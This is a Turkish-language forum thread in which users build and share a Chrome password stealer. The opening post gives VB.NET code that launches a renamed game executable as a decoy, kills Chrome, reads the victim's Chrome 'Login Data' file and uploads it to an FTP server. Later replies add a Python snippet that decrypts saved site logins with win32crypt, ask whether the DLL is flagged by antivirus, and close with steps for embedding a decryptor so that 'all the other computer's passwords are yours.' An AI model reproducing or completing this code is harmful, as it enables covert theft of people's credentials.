.Net Chrome Şifre Çalıcı
-
gece gece can sıkıntısına birşeyler karaladım fakat bir yerde takıldım vb.net console üzerinden yazdım programı kısaca ne işe yarıyor bahsedeyim chromeun "\AppData\Local\Google\Chrome\User Data\Default\" adresindeki login datayı ftp ye upload ediyor takıldığım nokta şu aldığım login datayı chromepassworddecryptor ile açamıyorum hata veriyor chromepass last log-on password soruyor dosyayı nasıl açacağız :D
programı gizlemek için japonmario adlı oyunu indirdim exesini m olarak değiştirip bgm içine attım
Kodlar
Imports System.IO.Directory
Shell(My.Application.Info.DirectoryPath & "\BGM\m.exe", AppWinStyle.NormalFocus)
Dim path1, path2, path3, path4, path5 As String
Dim user As String
user = System.Environment.UserName
Dim Chrome() As Process = Process.GetProcessesByName("chrome")
For Each Process As Process In Chrome
Process.Kill()
Next
Dim pathc As String
pathc = "C:\Users\" & user & "\AppData\Local\Google\Chrome\User Data\Default\"
path4 = pathc & "Login Data"
Dim clsRequest As System.Net.FtpWebRequest = _
DirectCast(System.Net.WebRequest.Create("ftp://****/www/Ops/" & user), System.Net.FtpWebRequest)
clsRequest.Credentials = New System.Net.NetworkCredential("********", "*********")
clsRequest.Method = System.Net.WebRequestMethods.Ftp.UploadFile
Dim bFile() As Byte = System.IO.File.ReadAllBytes(path4)
Dim clsStream As System.IO.Stream = _
clsRequest.GetRequestStream()
clsStream.Write(bFile, 0, bFile.Length)
clsStream.Close()
clsStream.Dispose()
-
kendi bilgisayardaki verilerle dene, gmail şifresi mi soruyor ona bak
-
chrome sifresi sadece kendi bilgisayarinda acilabiliyor diye biliyorum.
Edit : http://www.tahribat.com/Forum-Chrome-Password-Decrypter-V0-1-88696/
undefined-01 tarafından 14/Tem/14 09:53 tarihinde düzenlenmiştir -
-
aynen dediğin gibiymiş abi dosyayı Decrypt edip almak gerekiyormuş bunun içinde wh0 ya mesaj attım fakat onun dışında bilen varsa tabiki yazabilir :))
-
from os import getenvimport sqlite3import win32crypt# Connect to the Databaseconn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")cursor = conn.cursor()# Get the resultscursor.execute('SELECT action_url, username_value, password_value FROM logins')for result in cursor.fetchall():# Decrypt the Passwordpassword = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]if password:print 'Site: ' + result[0]print 'Username: ' + result[1]print 'Password: ' + passwordtarzında bir örnek buldum fakat win32crypt .dll nerden bulabilirim birde bu dll wirüs olarak algılarnır mı
-
Sonunda İşi Çözdüm :)
vb.net de yeni bir konsol uygulaması açıp
http://www.sanjevirau.com/Downloads/ChromePasswordDecryptor.exe
bunu projeye ekleyin ismini Chrm.exe olarak değiştirin propertiesinden Embedded Resource yapın daha sonra kodları yapıştırın https://yadi.sk/i/rg-C_8nJWgXqe
ftp bilgilerini düzenleyin karşı bilgisayarın tüm şifreleri sizde :)
